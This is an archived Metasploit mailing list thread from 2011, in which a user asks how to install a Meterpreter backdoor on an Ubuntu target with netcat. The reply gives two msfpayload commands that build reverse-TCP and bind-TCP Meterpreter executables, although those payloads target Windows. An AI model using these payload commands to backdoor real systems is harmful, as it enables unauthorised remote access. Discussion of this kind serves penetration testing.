Metasploit mailing list archives

Re: Backboor with Netcat and Meterpreter


From: Average SecurityGuy <averagesecurityguy () gmail com>
Date: Thu, 7 Jul 2011 15:23:15 -0400

You don't need netcat.

Try this:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=2222 X >
meterpreter_reverse_2222.exe

or this:

msfpayload windows/meterpreter/bind_tcp LPORT=2222 X >
meterpreter_bind_2222.exe

On Thu, Jul 7, 2011 at 10:22 AM, Rafael Negron <rnegron13 () comcast net>wrote:

Hello,

I have an Ubuntu 10.04 as my target and I want to install a meterpreter
backdoor.
I was hoping to use netcat so that I can change the listening port easily,
and the -e option to execute meterpreter.

Is this possible?
How do I configure meterpreter?
What is the easiest way to demonstrate this?

Rafael


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: